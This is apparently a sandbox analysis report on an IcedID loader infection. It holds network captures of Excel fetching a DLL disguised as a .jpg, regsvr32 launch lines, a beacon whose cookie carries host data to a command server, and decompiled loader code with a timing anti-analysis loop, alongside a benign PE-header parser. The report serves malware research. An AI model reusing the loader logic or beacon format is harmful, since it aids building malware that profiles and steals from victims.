Jul 6, 2021 17:49:53.810337067 CEST | 10 | IN | Data Raw: 00 00 48 89 b4 24 60 03 00 00 48 8b b4 24 60 03 00 00 89 b4 24 6c 03 00 00 c7 84 24 84 00 00 00 00 00 00 00 8b 84 24 84 00 00 00 3b 84 24 80 00 00 00 0f 83 c4 00 00 00 48 8b 84 24 a0 00 00 00 48 89 84 24 50 03 00 00 48 8b 84 24 50 03 00 00 89 84
Data Ascii: H$`H$`$l$$;$H$H$PH$P$\HL$pHL$xH$H$@H$@$LLD$xILD$xL$L$0L$0D$<LL$pILL$pL$L$ L$ D$,$$
Jul 6, 2021 17:49:53.810358047 CEST | 12 | IN | Data Raw: a8 00 00 00 41 8b 48 28 41 89 c8 4c 01 c2 48 89 54 24 50 48 8b 54 24 50 48 89 94 24 d0 01 00 00 48 8b 94 24 d0 01 00 00 89 94 24 dc 01 00 00 48 83 7c 24 50 00 0f 84 27 00 00 00 48 8b 44 24 50 48 8b 8c 24 a0 00 00 00 48 8b 15 47 c7 00 00 89 4c 24
Data Ascii: AH(ALHT$PHT$PH$H$$H|$P'HD$PH$HGL$(HDD$(E1H$H$TE1DHD$@HD$@H$H$$H;L$@qH$H$H$$HL$@DLHLHL$ L
Jul 6, 2021 17:49:53.810383081 CEST | 13 | IN | Data Raw: 48 8b 4c 24 38 0f b7 41 16 83 e0 01 83 f8 00 0f 84 31 00 00 00 8b 44 24 60 89 84 24 40 01 00 00 c6 44 24 67 00 48 8b 4c 24 68 48 89 8c 24 30 01 00 00 48 8b 8c 24 30 01 00 00 89 8c 24 3c 01 00 00 e9 3d 00 00 00 48 8b 44 24 68 48 89 84 24 20 01 00
Data Ascii: HL$8A1D$`$@D$gHL$hH$0H$0$<=HD$hH$ H$ $,D$gHL$hH$H$$D$`$HD$hH$H$$|$`MD$`$HL$@AD$TD$T$D$TT$`)T$`D$`$
Jul 6, 2021 17:49:53.810405016 CEST | 14 | IN | Data Raw: 01 00 00 48 8b 84 24 70 01 00 00 89 84 24 7c 01 00 00 48 8b 4c 24 68 8b 01 89 c1 48 03 8c 24 88 00 00 00 48 89 4c 24 58 48 8b 4c 24 58 48 89 8c 24 60 01 00 00 48 8b 8c 24 60 01 00 00 89 8c 24 6c 01 00 00 48 8b 54 24 68 8b 42 10 89 c2 48 03 94 24
Data Ascii: H$p$|HL$hH$HL$XHL$XH$`H$`$lHT$hBH$HT$@HT$@H$PH$P$\hH$$LHL$hAH$HL$XHL$XH$@H$@$HHT$XHT$@HT$@H$0H$0$<H$$,
Jul 6, 2021 17:49:53.810426950 CEST | 16 | IN | Data Raw: 48 01 c8 48 89 44 24 30 48 8b 44 24 30 48 89 84 24 80 00 00 00 e9 70 00 00 00 48 8b 44 24 68 48 89 84 24 b8 00 00 00 48 8b 84 24 b8 00 00 00 89 84 24 c4 00 00 00 8b 44 24 4c 83 c0 01 89 44 24 4c e9 93 fe ff ff 48 8b 44 24 68 48 89 84 24 a8 00 00
Data Ascii: HHD$0HD$0H$pHD$hH$H$$D$LD$LHD$hH$H$$HD$hH$H$$H$H$HH$LL$`DD$\T$[HL$PD$<HL$PHL$pHL$pL$|HL$PD$+HD$HHD$
Jul 6, 2021 17:49:53.810961008 CEST | 17 | IN | Data Raw: 8b 8c 24 a0 00 00 00 89 8c 24 ac 00 00 00 e9 63 ff ff ff 48 8b 44 24 30 48 89 84 24 90 00 00 00 48 8b 84 24 90 00 00 00 89 84 24 9c 00 00 00 48 8b 44 24 50 48 89 84 24 80 00 00 00 48 8b 84 24 80 00 00 00 89 84 24 8c 00 00 00 48 c7 44 24 68 00 00
Data Ascii: $$cHD$0H$H$$HD$PH$H$$HD$hHD$hHHHT$HL$HD$HD$ HD$ D$,HL$H$H$$HD$H$H$$HL$HHHT$D$HL$H$H$
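Sessions 0 and 1 are the same request (same `.jpg` path, same MSIE 7.0 User-Agent from EXCEL.EXE) answered two different ways: thousandsyears.download returns `text/html` with a chunked, gzip-encoded body, while voopeople.fun returns `application/octet-stream`, a `Content-Disposition` filename of `lsdfik.fml`, and a body that begins with `MZ`. The script below is an added example, not part of the sandbox report or of any tool the report uses. It re-analyses both captured responses offline: it de-chunks and gunzips the first body, checks each decoded body's magic bytes against the URL extension, and for the second parses the DOS, COFF, optional and section headers out of the 608 bytes the report dumps. The byte strings are constructed from the Data Raw columns above (the session 1 buffer stops where the dump does, so the parser must cope with a section table cut off mid-entry); the function names and the report dictionary layout are this example's own.

```python
import gzip
import struct
from datetime import datetime, timezone

# Constructed inputs transcribed from the report's Data Raw columns (not live traffic).
# Session 0: chunked + gzip; chunk "14" is an empty gzip member (header, empty deflate
# block 03 00, CRC32 0, ISIZE 0), followed by the terminating zero-length chunk.
SESSION0_HEADERS = {"Content-Type": "text/html; charset=UTF-8",
                    "Transfer-Encoding": "chunked", "Content-Encoding": "gzip"}
SESSION0_BODY = b"14\r\n" + bytes.fromhex("1f8b0800000000000003" "0300" "00000000" "00000000") + b"\r\n0\r\n\r\n"
# Session 1: the 608 bytes the report dumps of a 57856-byte body; .pdata's header is cut off.
SESSION1_HEADERS = {"Content-Type": "application/octet-stream", "Content-Length": "57856",
                    "Content-Disposition": "attachment; filename=lsdfik.fml"}
SESSION1_BODY = bytes.fromhex(
    # IMAGE_DOS_HEADER (e_lfanew = 0xc8), DOS stub, Rich header
    "4d5a90000300000004000000ffff0000b80000000000000040000000" + "00" * 32 + "c8000000"
    + "0e1fba0e00b409cd21b8014ccd21"
    + b"This program cannot be run in DOS mode.\r\r\n$".hex() + "00" * 7
    + "098ff1c74dee9f944dee9f944dee9f943e8c9e954eee9f944dee9e944bee9f94"
    + "4dee9f9449ee9f94e8879f954cee9f94e8879d954cee9f94526963684dee9f94" + "00" * 8
    # "PE\0\0" + IMAGE_FILE_HEADER: Machine 0x8664, 4 sections, stamp 0x60e40686, Characteristics 0x2022
    + "50450000648604008606e4600000000000000000f0002220"
    # IMAGE_OPTIONAL_HEADER64: 112 fixed bytes, then the 16 data directories
    + "0b020000003a000000a4000000000000" "20130000001000000000008001000000"
    + "00100000000200000600000000000000" "06000000000000000010010000040000"
    + "f8ba0100010060010000100000000000" "00100000000000000000100000000000"
    + "00100000000000000000000010000000"
    + "a0ec0000fc0000009ced000028000000" "000000000000000000000100cc000000" + "00" * 16
    + "00eb00001c0000000000000000000000" + "00" * 32
    + "00500000400000000000000000000000" + "00" * 16
    # IMAGE_SECTION_HEADERs: .text, .rdata, .data complete; .pdata truncated
    + "2e74657874000000" "28380000" "00100000" "003a0000" "00040000" + "00" * 12 + "20000060"
    + "2e72646174610000" "7e9e0000" "00500000" "00a00000" "003e0000" + "00" * 12 + "40000040"
    + "2e64617461000000" "60000000" "00f00000" "00020000" "00de0000" + "00" * 12 + "400000c0"
    + "2e70646174610000" "cc000000" "00000100" "00020000" "00e00000")

def dechunk(body: bytes) -> bytes:
    """Reassemble a Transfer-Encoding: chunked body (chunk extensions and trailers ignored)."""
    out, pos = bytearray(), 0
    while True:
        nl = body.index(b"\r\n", pos)
        size = int(body[pos:nl].split(b";")[0], 16)
        if size == 0:
            return bytes(out)
        out += body[nl + 2:nl + 2 + size]
        pos = nl + 2 + size + 2                      # skip the data and its trailing CRLF

def decode_body(headers: dict, body: bytes) -> bytes:
    """Undo transfer and content encodings so the magic-byte check sees the real payload."""
    if headers.get("Transfer-Encoding", "").lower() == "chunked":
        body = dechunk(body)
    return gzip.decompress(body) if headers.get("Content-Encoding", "").lower() == "gzip" else body

def sniff(data: bytes) -> str:
    """Identify a body by its magic bytes, not by what the URL or Content-Type claims."""
    return ("empty" if not data else "pe" if data[:2] == b"MZ"
            else "jpeg" if data[:3] == b"\xff\xd8\xff" else "unknown")

def parse_pe_headers(data: bytes) -> dict:
    """DOS, COFF and optional headers, plus every section header the buffer fully contains."""
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[:2] != b"MZ" or data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("not a PE image")
    machine, nsec, ts, _, _, opt_size, chars = struct.unpack_from("<HHIIIHH", data, e_lfanew + 4)
    opt = e_lfanew + 24
    magic = struct.unpack_from("<H", data, opt)[0]
    base_fmt, base_off = {0x20B: ("<Q", 24), 0x10B: ("<I", 28)}[magic]   # PE32+ / PE32 ImageBase
    subsystem, dll_chars = struct.unpack_from("<HH", data, opt + 68)
    sections, table = [], opt + opt_size
    for i in range(nsec):
        off = table + 40 * i
        if off + 40 > len(data):                     # capture ends mid-table: report, do not guess
            break
        vsize, va, rawsize, rawptr = struct.unpack_from("<IIII", data, off + 8)
        sections.append({"name": data[off:off + 8].rstrip(b"\0").decode("ascii", "replace"),
                         "virtual_size": vsize, "virtual_address": va, "raw_size": rawsize,
                         "raw_pointer": rawptr, "characteristics": struct.unpack_from("<I", data, off + 36)[0]})
    return {"machine": machine, "number_of_sections": nsec, "is_dll": bool(chars & 0x2000),
            "timestamp_utc": datetime.fromtimestamp(ts, tz=timezone.utc).isoformat(),
            "entry_point": struct.unpack_from("<I", data, opt + 16)[0],
            "image_base": struct.unpack_from(base_fmt, data, opt + base_off)[0],
            "subsystem": subsystem, "dll_characteristics": dll_chars,
            "sections": sections, "section_table_truncated": len(sections) < nsec}

def classify_response(url_path: str, headers: dict, body: bytes) -> dict:
    """Compare what the URL and headers claim with what the decoded body actually is."""
    payload, name = decode_body(headers, body), url_path.rsplit("/", 1)[-1]
    ext = name.rsplit(".", 1)[-1].lower() if "." in name else ""
    report = {"url_extension": ext, "sniffed": sniff(payload), "decoded_length": len(payload),
              "content_type": headers.get("Content-Type", "").split(";")[0].strip().lower(),
              "findings": []}
    if not payload:
        report["findings"].append("response decodes to zero bytes")
    if ext in ("jpg", "jpeg") and report["sniffed"] != "jpeg":
        report["findings"].append(f"URL ends in .{ext} but body is {report['sniffed']}")
    if report["sniffed"] == "pe":
        pe = report["pe"] = parse_pe_headers(payload)
        report["findings"].append(f"PE {'DLL' if pe['is_dll'] else 'EXE'} linked {pe['timestamp_utc']}")
    return report
```

Calling `classify_response("/div/44376,8555986111.jpg", ...)` on session 0 reports a body that decodes to zero bytes, and on session 1 a PE whose COFF Characteristics (0x2022) include IMAGE_FILE_DLL: the file behind the `.jpg` URL and the `.fml` filename is an x64 DLL, with an export directory at RVA 0xeca0, so whatever drops it has to load it through an export rather than run it directly. The TimeDateStamp decodes to 2021-07-06 07:30:14 UTC, roughly eight hours before the 15:49 UTC capture, if the linker stamp was not altered. The parser deliberately stops at the end of the captured bytes and flags `section_table_truncated` instead of inventing the missing `.pdata` fields; on the full 57856-byte file it would return all four section headers.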


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
2 | 192.168.2.22 | 49169 | 172.67.146.88 | 80 | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Timestamp | kBytes transferred | Direction | Data
Jul 6, 2021 17:49:53.972748041 CEST | 64 | OUT | GET /div/44376,8555986111.jpg HTTP/1.1
Accept: */*
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: uppercilio.fun
Connection: Keep-Alive
Jul 6, 2021 17:49:54.050466061 CEST | 65 | IN | HTTP/1.1 200 OK
Date: Tue, 06 Jul 2021 15:49:54 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Cache-Control: max-age=14400
CF-Cache-Status: HIT
Age: 6802
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=7E1Qp76m%2Fht05NPBB9oV%2BTmOx%2BkQk8ceFNdMA5Ouj%2BzOBFAyElgjmkMCqDz97c%2BGdxm2R2UH7bnz0WUwpzxBLyfCY0fHq9cp8Mu6jK1DfJIhjGS5Wlx0Etq7eig%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 66a9fc54898816ea-FRA
Content-Encoding: gzip
alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
Data Raw: 31 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 03 00 00 00 00 00 00 00 00 00 0d 0a
Data Ascii: 14
Jul 6, 2021 17:49:54.050488949 CEST | 65 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
3 | 192.168.2.22 | 49171 | 104.21.37.209 | 80 | C:\Windows\System32\regsvr32.exe

Timestamp | kBytes transferred | Direction | Data
Jul 6, 2021 17:49:56.660301924 CEST | 323 | OUT | GET / HTTP/1.1
Connection: Keep-Alive
Cookie: __gads=3565085024:1:5640:53; _gat=6.1.7601.64; _ga=1.329303.0.4; _u=373135353735:416C627573:38443943323244313446374646354435; __io=0; _gid=67AFEDC5AC03
Host: astrocycle.download
Jul 6, 2021 17:49:57.236242056 CEST | 324 | IN | HTTP/1.1 404 Not Found
Date: Tue, 06 Jul 2021 15:49:57 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=Xf2IDfcLQCVH1rz6byqCytHzvmEvCgcaCZRg%2F9gUSLGEhZx6kGlSL%2BnZB0MJnL3Kz5tZUf2obw5UnExmwPSZFk8Kddx%2FnyTc43EeLUX3kCfMGteS4IxdgGxjDeCGf2BD7A%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 66a9fc654c6c4e8b-FRA
alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
Data Raw: 31 31 31 0d 0a 09 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 09 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 09 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 09 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 09 3c 68 72 3e 0a 09 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 61 73 74 72 6f 63 79 63 6c 65 2e 64 6f 77 6e 6c 6f 61 64 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 09 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: 111<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at astrocycle.download Port 80</address></body></html>
Jul 6, 2021 17:49:57.236459970 CEST | 324 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


HTTPS Packets

Timestamp | Source IP | Source Port | Dest IP | Dest Port | JA3 SSL Client Fingerprint | JA3 SSL Client Digest
Jul 6, 2021 17:49:55.133055925 CEST | 13.224.92.73 | 443 | 192.168.2.22 | 49170 | 769,49172-49171-57-51-53-47-49162-49161-56-50-10-19-5-4,0-10-11-23-65281,23-24,0 | 05af1f5ca1b87cc9cc9b25185115607d

Certificate chain for this session (Subject | Issuer | Not Before | Not After):
CN=aws.amazon.com | CN=Amazon, OU=Server CA 1B, O=Amazon, C=US | Wed Sep 30 02:00:00 CEST 2020 | Thu Sep 23 14:00:00 CEST 2021
CN=Amazon, OU=Server CA 1B, O=Amazon, C=US | CN=Amazon Root CA 1, O=Amazon, C=US | Thu Oct 22 02:00:00 CEST 2015 | Sun Oct 19 02:00:00 CEST 2025
CN=Amazon Root CA 1, O=Amazon, C=US | CN=Starfield Services Root Certificate Authority - G2, O="Starfield Technologies, Inc.", L=Scottsdale, ST=Arizona, C=US | Mon May 25 14:00:00 CEST 2015 | Thu Dec 31 02:00:00 CET 2037
CN=Starfield Services Root Certificate Authority - G2, O="Starfield Technologies, Inc.", L=Scottsdale, ST=Arizona, C=US | OU=Starfield Class 2 Certification Authority, O="Starfield Technologies, Inc.", C=US | Wed Sep 02 02:00:00 CEST 2009 | Wed Jun 28 19:39:16 CEST 2034

Code Manipulations

Statistics

CPU Usage

Memory Usage

High Level Behavior Distribution

Behavior

System Behavior

General

Start time: 17:49:42
Start date: 06/07/2021
Path: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Wow64 process (32bit): false
Commandline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Imagebase: 0x13f4b0000
File size: 27641504 bytes
MD5 hash: 5FB0A0F93382ECD19F5F499A5CAA59F0
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 17:49:45
Start date: 06/07/2021
Path: C:\Windows\System32\regsvr32.exe
Wow64 process (32bit): false
Commandline: regsvr32 -silent ..\XRAY.dll
Imagebase: 0xff140000
File size: 19456 bytes
MD5 hash: 59BCE9F07985F8A4204F4D6554CFF708
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 17:49:45
Start date: 06/07/2021
Path: C:\Windows\System32\regsvr32.exe
Wow64 process (32bit): false
Commandline: regsvr32 -silent ..\XTOWN.dll
Imagebase: 0xff140000
File size: 19456 bytes
MD5 hash: 59BCE9F07985F8A4204F4D6554CFF708
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_IcedID_1, Description: Yara detected IcedID, Source: 00000004.00000002.2104206264.00000000002D7000.00000004.00000020.sdmp, Author: Joe Security
• Rule: MAL_IcedID_GZIP_LDR_202104, Description: 2021 initial Bokbot / Icedid loader for fake GZIP payloads, Source: 00000004.00000002.2104111082.0000000000190000.00000004.00000001.sdmp, Author: Thomas Barabosch, Telekom Security
                                                                                                                                                                                                                                                                    Reputation:high

                                                                                                                                                                                                                                                                    General

                                                                                                                                                                                                                                                                    Start time:17:49:49
                                                                                                                                                                                                                                                                    Start date:06/07/2021
                                                                                                                                                                                                                                                                    Path:C:\Windows\System32\regsvr32.exe
                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                    Commandline:regsvr32 -silent ..\XZIBIT.dll
                                                                                                                                                                                                                                                                    Imagebase:0xff140000
                                                                                                                                                                                                                                                                    File size:19456 bytes
                                                                                                                                                                                                                                                                    MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                    Reputation:high

Disassembly

Code Analysis

Executed Functions

C-Code - Quality: 25%
E001B27BC(long long __rbx, void* __rcx, signed long long __rsi, long long __rbp, void* _a8, void* _a16, void* _a24, void* _a32) {
	void* __rdi;
	int _t23;
	void* _t24;
	void* _t27;
	intOrPtr _t35;
	void* _t36;
	intOrPtr* _t44;
	long long _t46;
	intOrPtr* _t48;
	intOrPtr* _t54;
	intOrPtr* _t62;
	signed long long _t64;
	long long* _t67;
	intOrPtr* _t69;
	void* _t77;
	void* _t78;
	struct HINSTANCE__* _t79;
	void* _t80;
	CHAR* _t82;
	char* _t83;

	_t64 = __rsi;
	_t46 = __rbx;
	_t44 = _t69;
	 *((long long*)(_t44 + 8)) = __rbx;
	 *((long long*)(_t44 + 0x18)) = __rbp;
	 *((long long*)(_t44 + 0x20)) = __rsi;
	_push(_t62);
	_t80 = __rcx;
	_t83 = L"; _gid=";
	 *(_t44 + 0x10) =  *(_t44 + 0x10) & 0;
	LoadLibraryA(_t82);
	GetProcAddress(_t79);
	_t67 = _t44;
	if(_t44 == 0) {
		L6:
		r9d = 1;
		_t23 = E001B2990(_t36, _t44, _t46, _t80, L"; _gid=", _t62, 0x1b70c4, _t77, _t78);
		L7:
		return _t23;
	}
	_t24 =  *_t67(); // executed
	if(_t24 == 0x6f && __rbx != 0) {
		GetProcessHeap();
		_t9 = _t64 + 8; // 0x8
		_t36 = _t9;
		HeapAlloc(??, ??, ??);
		_t62 = _t44;
		if(_t44 == 0) {
			goto L6;
		}
		_t54 = _t44; // executed
		_t27 =  *_t67(); // executed
		if(_t27 == 0) {
			_t48 = _t62;
			do {
				if( *((char*)(_t48 + 0x1c0)) != 0x30 ||  *((char*)(_t48 + 0x1c1)) != 0x2e) {
					_t35 =  *((intOrPtr*)(_t48 + 0x194));
					if(_t54 - 1 <= 7) {
						r9d = _t35;
						_t18 = _t48 + 0x198; // 0x198
						_t54 = _t80 + _t64 * 2;
						E001B2990(_t36, _t44, _t48, _t54, _t83, _t62, _t18, _t77, _t78);
						_t64 = _t64 + _t44;
						_t83 = ":";
					}
				}
				_t48 =  *_t48;
			} while (_t48 != 0);
			GetProcessHeap();
			_t36 = 0;
			_t23 = HeapFree(??, ??, ??);
			if(_t64 == 0) {
				goto L6;
			}
			goto L7;
		}
		GetProcessHeap();
		_t36 = 0;
		HeapFree(??, ??, ??);
	}
}
























                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      • GetAdaptersInfo.IPHLPAPI(?,?,00000000,001B2CFE,?,?,00000003,001B24A4), ref: 001B280F
                                                                                                                                                                                                                                                                      • GetAdaptersInfo.IPHLPAPI(?,?,00000000,001B2CFE,?,?,00000003,001B24A4), ref: 001B2845
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2104115614.00000000001B0000.00000040.00000001.sdmp, Offset: 001B0000, based on PE: true
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: AdaptersInfo
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 3177971545-0
                                                                                                                                                                                                                                                                      • Opcode ID: fc699fa13e68b788d874d6a78f58e359039745370b383d3aa825a9febfb906a8
                                                                                                                                                                                                                                                                      • Instruction ID: c60b736c70a9bf67489b71118c13e7adc89abf349c8ce38b573650b6f9e0f5ab
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: fc699fa13e68b788d874d6a78f58e359039745370b383d3aa825a9febfb906a8
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 21316B76705B8196EB15EB66E8407D977A0FB89F94F488026EF0D0775AEF38C58AC340
                                                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      • NtQuerySystemInformation.NTDLL(?,?,00000000,001B2CB1,?,?,00000003,001B24A4), ref: 001B16CB
                                                                                                                                                                                                                                                                      • RtlAllocateHeap.NTDLL(?,?,00000000,001B2CB1,?,?,00000003,001B24A4), ref: 001B1709
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2104115614.00000000001B0000.00000040.00000001.sdmp, Offset: 001B0000, based on PE: true
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: AllocateHeapInformationQuerySystem
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 3114120137-0
                                                                                                                                                                                                                                                                      • Opcode ID: 15ab51baa947bc1f3c3fdf1eb6848148db47552542206cc3bcd8ce7c2f187386
                                                                                                                                                                                                                                                                      • Instruction ID: de5eaa73b4bf9c880d833e3b3f886915295f1350fa53a2abd89165a0753c6d5c
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 15ab51baa947bc1f3c3fdf1eb6848148db47552542206cc3bcd8ce7c2f187386
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: AA217C75315B4093EF04AB56E8643E972A2BB89BC1F9A8034EE0A87715EF3CC8458700
                                                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2104115614.00000000001B0000.00000040.00000001.sdmp, Offset: 001B0000, based on PE: true
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: AllocateHeap
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 1279760036-0
                                                                                                                                                                                                                                                                      • Opcode ID: c3a72f5bfcfd91918b5e83c3bb15c180b6cc2b39742bdcf2d413e26ac2e8c0cf
                                                                                                                                                                                                                                                                      • Instruction ID: 5be9b9012fc57d3ca06ec49e383a8e517c543350cab4152e28e5ac8411bb9b6b
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c3a72f5bfcfd91918b5e83c3bb15c180b6cc2b39742bdcf2d413e26ac2e8c0cf
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1871DB32311B819BEB24CF66E860BE937A5FB48B94F858129EE4A43B54DF38D595C700
                                                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      • LookupAccountNameW.ADVAPI32 ref: 001B233C
                                                                                                                                                                                                                                                                      Memory Dump Source
• Source File: 00000004.00000002.2104115614.00000000001B0000.00000040.00000001.sdmp, Offset: 001B0000, based on PE: true
Similarity
• API ID: AccountLookupName
• String ID:
• API String ID: 1484870144-0
• Opcode ID: cafe0df7641921cb4b3b83197fca258bc474e661d5f4a52d45703bbf776aa30b
• Instruction ID: 60f7399251d735b1e8cad7b8c0da10334775dee052dc7b02c6ac96509f9298b4
• Opcode Fuzzy Hash: cafe0df7641921cb4b3b83197fca258bc474e661d5f4a52d45703bbf776aa30b
• Instruction Fuzzy Hash: 5D316972705B418AEB109FB6E8443DA37A4FB48B88F588135EA4D57B29EF38C549C350
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 58%
// Decompiler output, reproduced as generated: caller registers arrive as
// parameters, and temporaries such as _t75 (the incoming stack pointer; rbx
// and rdi are spilled to its 0x18/0x20 home slots) are used without being
// declared. Arguments shown as ?? were not recovered by the decompiler.
E001B2434(void* __eax, signed long long __rax, signed long long __rbx, signed int __rcx, signed long long __rdx, long long __rdi, void* __rsi, void* __r9, void* __r11, void* __r14) {
    void* __rbp;
    void* _t27;
    void* _t40;
    void* _t41;
    signed long long _t51;
    signed long long _t52;
    signed long long _t64;
    long long _t69;
    void* _t73;
    void* _t75;
    void* _t82;

    _t82 = __r9;
    _t71 = __rsi;
    _t69 = __rdi;
    _t64 = __rdx;
    _t52 = __rbx;
    _t51 = __rax;
    *((long long*)(_t75 + 0x18)) = __rbx;
    *((long long*)(_t75 + 0x20)) = __rdi;
    _t73 = _t75 - 0x57;
    _t4 = _t52 + 4; // 0x4
    _t40 = _t4;
    goto L1;
    L9:
    return 0;
    L1:
    asm("rdtsc");                      // time-stamp counter into EDX:EAX (_t64:_t51)
    _t64 = _t64 << 0x20;               // EDX << 32 ...
    _t51 = _t51 | _t64;                // ... merged with EAX into one 64-bit stamp
    _t52 = _t52 << 0x00000010 | __rcx;
    SleepEx(??, ??); // executed       // one sleep per iteration; delay not recovered
    _t69 = _t69 - 1;                   // __rdi holds the iteration count
    if(_t69 != 0) {
        goto L1;                       // repeat the rdtsc + SleepEx measurement
    } else {
        // the merged counter values (_t51, _t52) are handed to the callees
        // below; whatever compares them lives outside this function
        wsprintfA();
        E001B11FC(_t73 - 0x29, _t52);
        _t37 = E001B153C(_t73 - 0x29);
        E001B2C08( *((intOrPtr*)(_t73 + 0x17)), _t23, _t40, _t51, _t52, __rsi, _t73, _t73 - 0x49, _t82);
        _t44 = _t51;
        if(_t51 != 0) {
            _t80 = _t73 + 0x67;
            if(E001B1EEC(_t37, _t44, _t51, _t52, _t73 + 0x1b, _t51, _t71, _t73, _t73 + 0x67, _t73 + 0x6f, __r11, __r14) != 0) {
                _t67 =  *((intOrPtr*)(_t73 + 0x6f));
                if( *((intOrPtr*)(_t73 + 0x6f)) >= 0x400) {   // size at _t73+0x6f must be at least 0x400 bytes
                    _t27 = E001B272C(0, _t37, _t40,  *((intOrPtr*)(_t73 + 0x67)), _t67, _t69, _t73, _t80, __r11, __r14);
                    _t55 =  *((intOrPtr*)(_t73 + 0x67));
                    _t41 = _t27;
                    if( *((intOrPtr*)(_t73 + 0x67)) != 0) {
                        GetProcessHeap();
                        HeapFree(??, ??, ??);              // releases the buffer pointed to by _t73+0x67
                    }
                    E001B1FD0(_t41, _t51, _t55, _t73 - 0x49, _t71);
                    _t49 = _t51;
                    if(_t51 != 0) {
                        E001B2A1C(_t49, _t73 + 0x1b, _t51);
                    }
                }
            }
        }
        goto L9;
    }
}
